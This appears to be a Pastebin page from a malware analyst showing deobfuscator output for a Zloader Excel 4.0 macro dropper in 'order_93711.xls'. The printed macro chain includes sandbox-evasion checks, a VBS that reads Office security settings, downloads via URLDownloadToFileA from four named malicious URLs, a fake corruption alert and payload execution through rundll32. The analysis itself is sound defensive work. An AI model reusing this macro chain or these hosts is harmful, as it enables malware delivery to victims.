API tools faq
paste
Advertisement
dissectmalware

Zloader - new 2

dissectmalware
Jun 21st, 2020
332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.01 KB | None | 0 0
raw download clone embed print report
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe "C:\Program Files\JetBrains\PyCharm 2020.1\plugins\python\helpers\pydev\pydevd.py" --multiproc --qt-support=auto --client 127.0.0.1 --port 64300 --file C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\order_93711.xls\order_93711.xls
  2. pydev debugger: process 14944 is connecting
  3.  
  4. Connected to pydev debugger (build 201.6668.115)
  5.  
  6. _ _______
  7. |\ /|( \ ( )
  8. ( \ / )| ( | () () |
  9. \ (_) / | | | || || |
  10. ) _ ( | | | |(_)| |
  11. / ( ) \ | | | | | |
  12. ( / \ )| (____/\| ) ( |
  13. |/ \|(_______/|/ \|
  14. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  15. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  16. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  17. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  18. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  19. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  20. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  21. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  22.  
  23.  
  24. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  25.  
  26. File: C:\Users\user\Downloads\order_93711.xls\order_93711.xls
  27.  
  28. Unencrypted xls file
  29.  
  30. [Loading Cells]
  31. auto_open: auto_open->'egaz0Af2DyYfLadkmB'!$FR$27455
  32. [Starting Deobfuscation]
  33. CELL:FR27455 , FullEvaluation , FORMULA("=CHAR(R[51762]C[-81])",egaz0Af2DyYfLadkmB$GO$1321:$GO$1401)
  34. CELL:FR27456 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________)
  35. CELL:CQ46304 , FullEvaluation , "=CLOSE(FALSE)"
  36. CELL:CQ46305 , FullEvaluation , "=APP.MAXIMIZE()"
  37. CELL:CQ46306 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R33146C43),)"
  38. CELL:CQ46307 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R33146C43))"
  39. CELL:CQ46308 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R33146C43),)"
  40. CELL:CQ46309 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R33146C43),)"
  41. CELL:CQ46310 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)"
  42. CELL:CQ46311 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)"
  43. CELL:CQ46312 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R33146C43))"
  44. CELL:CQ46313 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R33146C43))"
  45. CELL:CQ46314 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R33146C43))"
  46. CELL:CQ46315 , FullEvaluation , "=""C:\Users\Public\FsWhHWf.vbs"""
  47. CELL:CQ46316 , FullEvaluation , "=""C:\Users\Public\DC6PdmLB.txt"""
  48. CELL:CQ46317 , FullEvaluation , "=FOPEN(R33157C43,3)"
  49. CELL:CQ46318 , FullEvaluation , "=FWRITELN(R33159C43,""On Error Resume Next"")"
  50. CELL:CQ46319 , FullEvaluation , "=FWRITELN(R33159C43,""Set CAA = CreateObject(""""WScript.Shell"""")"")"
  51. CELL:CQ46320 , FullEvaluation , "=FWRITELN(R33159C43,""Set cdtQbBq = CreateObject(""""Scripting.FileSystemObject"""")"")"
  52. CELL:CQ46321 , FullEvaluation , "=FWRITELN(R33159C43,""Set zgVEMWV = cdtQbBq.CreateTextFile(""""""&R33158C43&"""""", True)"")"
  53. CELL:CQ46322 , FullEvaluation , "=FWRITELN(R33159C43,""zgVEMWV.WriteLine(CAA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  54. CELL:CQ46323 , FullEvaluation , "=FWRITELN(R33159C43,""zgVEMWV.Close"")"
  55. CELL:CQ46324 , FullEvaluation , "=FCLOSE(R33159C43)"
  56. CELL:CQ46325 , FullEvaluation , "=EXEC(""explorer.exe ""&R33157C43&"""")"
  57. CELL:CQ46326 , FullEvaluation , "=WHILE(ISERROR(FILES(R33158C43)))"
  58. CELL:CQ46327 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  59. CELL:CQ46328 , FullEvaluation , "=NEXT()"
  60. CELL:CQ46329 , FullEvaluation , "=FILE.DELETE(R33157C43)"
  61. CELL:CQ46330 , FullEvaluation , "=FOPEN(R33158C43,2)"
  62. CELL:CQ46331 , FullEvaluation , "=FREAD(R33172C43,100)"
  63. CELL:CQ46332 , FullEvaluation , "=FCLOSE(R33172C43)"
  64. CELL:CQ46333 , FullEvaluation , "=FILE.DELETE(R33158C43)"
  65. CELL:CQ46334 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R33173C43)),GOTO(R33146C43),)"
  66. CELL:CQ46335 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))"
  67. CELL:CQ46336 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________78)
  68. CELL:BK48037 , FullEvaluation , FORMULA("=FORMULA(R[-1734]C[32],R[-14892]C[-20])",egaz0Af2DyYfLadkmB$BK$48038:$BK$48069)
  69. CELL:BK48038 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-14892]C[-20])
  70. CELL:BK48039 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-14892]C[-20])
  71. CELL:BK48040 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R33146C43),)",R[-14892]C[-20])
  72. CELL:BK48041 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R33146C43))",R[-14892]C[-20])
  73. CELL:BK48042 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R33146C43),)",R[-14892]C[-20])
  74. CELL:BK48043 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R33146C43),)",R[-14892]C[-20])
  75. CELL:BK48044 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)",R[-14892]C[-20])
  76. CELL:BK48045 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)",R[-14892]C[-20])
  77. CELL:BK48046 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R33146C43))",R[-14892]C[-20])
  78. CELL:BK48047 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R33146C43))",R[-14892]C[-20])
  79. CELL:BK48048 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R33146C43))",R[-14892]C[-20])
  80. CELL:BK48049 , FullEvaluation , FORMULA("=""C:\Users\Public\FsWhHWf.vbs""",R[-14892]C[-20])
  81. CELL:BK48050 , FullEvaluation , FORMULA("=""C:\Users\Public\DC6PdmLB.txt""",R[-14892]C[-20])
  82. CELL:BK48051 , FullEvaluation , FORMULA("=FOPEN(R33157C43,3)",R[-14892]C[-20])
  83. CELL:BK48052 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""On Error Resume Next"")",R[-14892]C[-20])
  84. CELL:BK48053 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set CAA = CreateObject(""""WScript.Shell"""")"")",R[-14892]C[-20])
  85. CELL:BK48054 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set cdtQbBq = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-14892]C[-20])
  86. CELL:BK48055 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set zgVEMWV = cdtQbBq.CreateTextFile(""""""&R33158C43&"""""", True)"")",R[-14892]C[-20])
  87. CELL:BK48056 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""zgVEMWV.WriteLine(CAA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-14892]C[-20])
  88. CELL:BK48057 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""zgVEMWV.Close"")",R[-14892]C[-20])
  89. CELL:BK48058 , FullEvaluation , FORMULA("=FCLOSE(R33159C43)",R[-14892]C[-20])
  90. CELL:BK48059 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R33157C43&"""")",R[-14892]C[-20])
  91. CELL:BK48060 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R33158C43)))",R[-14892]C[-20])
  92. CELL:BK48061 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-14892]C[-20])
  93. CELL:BK48062 , FullEvaluation , FORMULA("=NEXT()",R[-14892]C[-20])
  94. CELL:BK48063 , FullEvaluation , FORMULA("=FILE.DELETE(R33157C43)",R[-14892]C[-20])
  95. CELL:BK48064 , FullEvaluation , FORMULA("=FOPEN(R33158C43,2)",R[-14892]C[-20])
  96. CELL:BK48065 , FullEvaluation , FORMULA("=FREAD(R33172C43,100)",R[-14892]C[-20])
  97. CELL:BK48066 , FullEvaluation , FORMULA("=FCLOSE(R33172C43)",R[-14892]C[-20])
  98. CELL:BK48067 , FullEvaluation , FORMULA("=FILE.DELETE(R33158C43)",R[-14892]C[-20])
  99. CELL:BK48068 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R33173C43)),GOTO(R33146C43),)",R[-14892]C[-20])
  100. CELL:BK48069 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))",R[-14892]C[-20])
  101. CELL:BK48070 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________79)
  102. CELL:AQ33147 , PartialEvaluation , APP.MAXIMIZE()
  103. CELL:AQ33148 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R33146C43),)
  104. CELL:AQ33149 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R33146C43))
  105. CELL:AQ33150 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R33146C43),)
  106. CELL:AQ33151 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R33146C43),)
  107. CELL:AQ33152 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)
  108. CELL:AQ33153 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)
  109. CELL:AQ33154 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R33146C43))
  110. CELL:AQ33155 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R33146C43))
  111. CELL:AQ33156 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R33146C43))
  112. CELL:AQ33156 , FullEvaluation , [TRUE]
  113. CELL:AQ33157 , FullEvaluation , "C:\Users\Public\FsWhHWf.vbs"
  114. CELL:AQ33158 , FullEvaluation , "C:\Users\Public\DC6PdmLB.txt"
  115. CELL:AQ33159 , PartialEvaluation , FOPEN("C:\Users\Public\FsWhHWf.vbs",3)
  116. CELL:AQ33160 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","On Error Resume Next")
  117. CELL:AQ33161 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set CAA = CreateObject(""WScript.Shell"")")
  118. CELL:AQ33162 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set cdtQbBq = CreateObject(""Scripting.FileSystemObject"")")
  119. CELL:AQ33163 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set zgVEMWV = cdtQbBq.CreateTextFile(""C:\Users\Public\DC6PdmLB.txt"", True)")
  120. CELL:AQ33164 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","zgVEMWV.WriteLine(CAA.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  121. CELL:AQ33165 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","zgVEMWV.Close")
  122. CELL:AQ33166 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)")
  123. CELL:AQ33167 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\FsWhHWf.vbs")
  124. CELL:AQ33168 , PartialEvaluation , WHILE(ISERROR(FILES(R33158C43)))
  125. CELL:AQ33171 , PartialEvaluation , FILE.DELETE("C:\Users\Public\FsWhHWf.vbs")
  126. CELL:AQ33172 , PartialEvaluation , FOPEN("C:\Users\Public\DC6PdmLB.txt",2)
  127. CELL:AQ33173 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\DC6PdmLB.txt"",2)",100)
  128. CELL:AQ33174 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\DC6PdmLB.txt"",2)")
  129. CELL:AQ33175 , PartialEvaluation , FILE.DELETE("C:\Users\Public\DC6PdmLB.txt")
  130. CELL:AQ33176 , FullBranching , IF(ISNUMBER(SEARCH("1",R33173C43)),GOTO(R33146C43),)
  131. CELL:AQ33176 , FullEvaluation , [TRUE] GOTO(R33146C43)
  132. CELL:AQ33146 , End , CLOSE(FALSE)
  133. CELL:AQ33176 , FullEvaluation , [FALSE]
  134. CELL:AQ33177 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))
  135. CELL:AQ33177 , FullEvaluation , [TRUE] GOTO(R13419C196)
  136. CELL:GN13419 , FullEvaluation , "=""C:\Users\Public\lxlGZ4A.html"""
  137. CELL:GN13420 , FullEvaluation , "=""https://wireborg.com/wp-keys.php"""
  138. CELL:GN13421 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38563C99,R38562C99,0,0)"
  139. CELL:GN13422 , FullEvaluation , "=FILES(R38562C99)"
  140. CELL:GN13423 , FullEvaluation , "=IF(ISERROR(R38565C99),GOTO(R38572C99),)"
  141. CELL:GN13424 , FullEvaluation , "=FOPEN(R38562C99)"
  142. CELL:GN13425 , FullEvaluation , "=FSIZE(R38567C99)"
  143. CELL:GN13426 , FullEvaluation , "=FCLOSE(R38567C99)"
  144. CELL:GN13427 , FullEvaluation , "=IF(R38568C99<40000,,GOTO(R38589C99))"
  145. CELL:GN13428 , FullEvaluation , "=""http://zmedia.shwetech.com/wp-keys.php"""
  146. CELL:GN13429 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38571C99,R38562C99,0,0)"
  147. CELL:GN13430 , FullEvaluation , "=FILES(R38562C99)"
  148. CELL:GN13431 , FullEvaluation , "=IF(ISERROR(R38573C99),GOTO(R38580C99),)"
  149. CELL:GN13432 , FullEvaluation , "=FOPEN(R38562C99)"
  150. CELL:GN13433 , FullEvaluation , "=FSIZE(R38575C99)"
  151. CELL:GN13434 , FullEvaluation , "=FCLOSE(R38575C99)"
  152. CELL:GN13435 , FullEvaluation , "=IF(R38576C99<40000,,GOTO(R38589C99))"
  153. CELL:GN13436 , FullEvaluation , "=""https://datalibacbi.ml/wp-keys.php"""
  154. CELL:GN13437 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38579C99,R38562C99,0,0)"
  155. CELL:GN13438 , FullEvaluation , "=FILES(R38562C99)"
  156. CELL:GN13439 , FullEvaluation , "=IF(ISERROR(R38581C99),GOTO(R38588C99),)"
  157. CELL:GN13440 , FullEvaluation , "=FOPEN(R38562C99)"
  158. CELL:GN13441 , FullEvaluation , "=FSIZE(R38583C99)"
  159. CELL:GN13442 , FullEvaluation , "=FCLOSE(R38583C99)"
  160. CELL:GN13443 , FullEvaluation , "=IF(R38584C99<40000,,GOTO(R38589C99))"
  161. CELL:GN13444 , FullEvaluation , "=""https://procacardenla.ga/wp-keys.php"""
  162. CELL:GN13445 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38587C99,R38562C99,0,0)"
  163. CELL:GN13446 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  164. CELL:GN13447 , FullEvaluation , "=ALERT(R38589C99)"
  165. CELL:GN13448 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  166. CELL:GN13449 , FullEvaluation , "=R38562C99&"",DllRegisterServer"""
  167. CELL:GN13450 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38591C99,R38592C99,0,5)"
  168. CELL:GN13451 , FullEvaluation , "=GOTO(R33146C43)"
  169. CELL:GN13452 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________80)
  170. CELL:DN28840 , FullEvaluation , FORMULA("=FORMULA(R[-15422]C[78],R[9721]C[-19])",egaz0Af2DyYfLadkmB$DN$28841:$DN$28873)
  171. CELL:DN28841 , FullEvaluation , FORMULA("=""C:\Users\Public\lxlGZ4A.html""",R[9721]C[-19])
  172. CELL:DN28842 , FullEvaluation , FORMULA("=""https://wireborg.com/wp-keys.php""",R[9721]C[-19])
  173. CELL:DN28843 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38563C99,R38562C99,0,0)",R[9721]C[-19])
  174. CELL:DN28844 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
  175. CELL:DN28845 , FullEvaluation , FORMULA("=IF(ISERROR(R38565C99),GOTO(R38572C99),)",R[9721]C[-19])
  176. CELL:DN28846 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
  177. CELL:DN28847 , FullEvaluation , FORMULA("=FSIZE(R38567C99)",R[9721]C[-19])
  178. CELL:DN28848 , FullEvaluation , FORMULA("=FCLOSE(R38567C99)",R[9721]C[-19])
  179. CELL:DN28849 , FullEvaluation , FORMULA("=IF(R38568C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
  180. CELL:DN28850 , FullEvaluation , FORMULA("=""http://zmedia.shwetech.com/wp-keys.php""",R[9721]C[-19])
  181. CELL:DN28851 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38571C99,R38562C99,0,0)",R[9721]C[-19])
  182. CELL:DN28852 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
  183. CELL:DN28853 , FullEvaluation , FORMULA("=IF(ISERROR(R38573C99),GOTO(R38580C99),)",R[9721]C[-19])
  184. CELL:DN28854 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
  185. CELL:DN28855 , FullEvaluation , FORMULA("=FSIZE(R38575C99)",R[9721]C[-19])
  186. CELL:DN28856 , FullEvaluation , FORMULA("=FCLOSE(R38575C99)",R[9721]C[-19])
  187. CELL:DN28857 , FullEvaluation , FORMULA("=IF(R38576C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
  188. CELL:DN28858 , FullEvaluation , FORMULA("=""https://datalibacbi.ml/wp-keys.php""",R[9721]C[-19])
  189. CELL:DN28859 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38579C99,R38562C99,0,0)",R[9721]C[-19])
  190. CELL:DN28860 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
  191. CELL:DN28861 , FullEvaluation , FORMULA("=IF(ISERROR(R38581C99),GOTO(R38588C99),)",R[9721]C[-19])
  192. CELL:DN28862 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
  193. CELL:DN28863 , FullEvaluation , FORMULA("=FSIZE(R38583C99)",R[9721]C[-19])
  194. CELL:DN28864 , FullEvaluation , FORMULA("=FCLOSE(R38583C99)",R[9721]C[-19])
  195. CELL:DN28865 , FullEvaluation , FORMULA("=IF(R38584C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
  196. CELL:DN28866 , FullEvaluation , FORMULA("=""https://procacardenla.ga/wp-keys.php""",R[9721]C[-19])
  197. CELL:DN28867 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38587C99,R38562C99,0,0)",R[9721]C[-19])
  198. CELL:DN28868 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[9721]C[-19])
  199. CELL:DN28869 , FullEvaluation , FORMULA("=ALERT(R38589C99)",R[9721]C[-19])
  200. CELL:DN28870 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[9721]C[-19])
  201. CELL:DN28871 , FullEvaluation , FORMULA("=R38562C99&"",DllRegisterServer""",R[9721]C[-19])
  202. CELL:DN28872 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38591C99,R38592C99,0,5)",R[9721]C[-19])
  203. CELL:DN28873 , FullEvaluation , FORMULA("=GOTO(R33146C43)",R[9721]C[-19])
  204. CELL:DN28874 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________81)
  205. CELL:CU38562 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html"
  206. CELL:CU38563 , FullEvaluation , "https://wireborg.com/wp-keys.php"
  207. CELL:CU38564 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://wireborg.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  208. CELL:CU38565 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  209. CELL:CU38566 , FullBranching , IF(ISERROR(R38565C99),GOTO(R38572C99),)
  210. CELL:CU38566 , FullEvaluation , [TRUE] GOTO(R38572C99)
  211. CELL:CU38572 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  212. CELL:CU38573 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  213. CELL:CU38574 , FullBranching , IF(ISERROR(R38573C99),GOTO(R38580C99),)
  214. CELL:CU38574 , FullEvaluation , [TRUE] GOTO(R38580C99)
  215. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  216. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  217. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  218. CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
  219. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  220. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  221. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  222. CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  223. CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
  224. CELL:CU38593 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\lxlGZ4A.html,DllRegisterServer",0,5)
  225. CELL:CU38594 , FullEvaluation , GOTO(R33146C43)
  226. CELL:AQ33146 , End , CLOSE(FALSE)
  227. CELL:CU38582 , FullEvaluation , [FALSE]
  228. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  229. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  230. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  231. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  232. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  233. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  234. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  235. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  236. CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  237. CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
  238. CELL:CU38593 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\lxlGZ4A.html,DllRegisterServer",0,5)
  239. CELL:CU38594 , FullEvaluation , GOTO(R33146C43)
  240. CELL:AQ33146 , End , CLOSE(FALSE)
  241. CELL:CU38574 , FullEvaluation , [FALSE]
  242. CELL:CU38575 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  243. CELL:CU38576 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  244. CELL:CU38577 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  245. CELL:CU38578 , FullEvaluation , IF(R38576C99<40000,,GOTO(R38589C99))
  246. CELL:CU38579 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  247. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  248. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  249. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  250. CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
  251. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  252. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  253. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  254. CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  255. CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
  256. CELL:CU38582 , FullEvaluation , [FALSE]
  257. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  258. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  259. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  260. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  261. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  262. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  263. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  264. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  265. CELL:CU38566 , FullEvaluation , [FALSE]
  266. CELL:CU38567 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  267. CELL:CU38568 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  268. CELL:CU38569 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  269. CELL:CU38570 , FullEvaluation , IF(R38568C99<40000,,GOTO(R38589C99))
  270. CELL:CU38571 , FullEvaluation , "http://zmedia.shwetech.com/wp-keys.php"
  271. CELL:CU38572 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  272. CELL:CU38573 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  273. CELL:CU38574 , FullBranching , IF(ISERROR(R38573C99),GOTO(R38580C99),)
  274. CELL:CU38574 , FullEvaluation , [TRUE] GOTO(R38580C99)
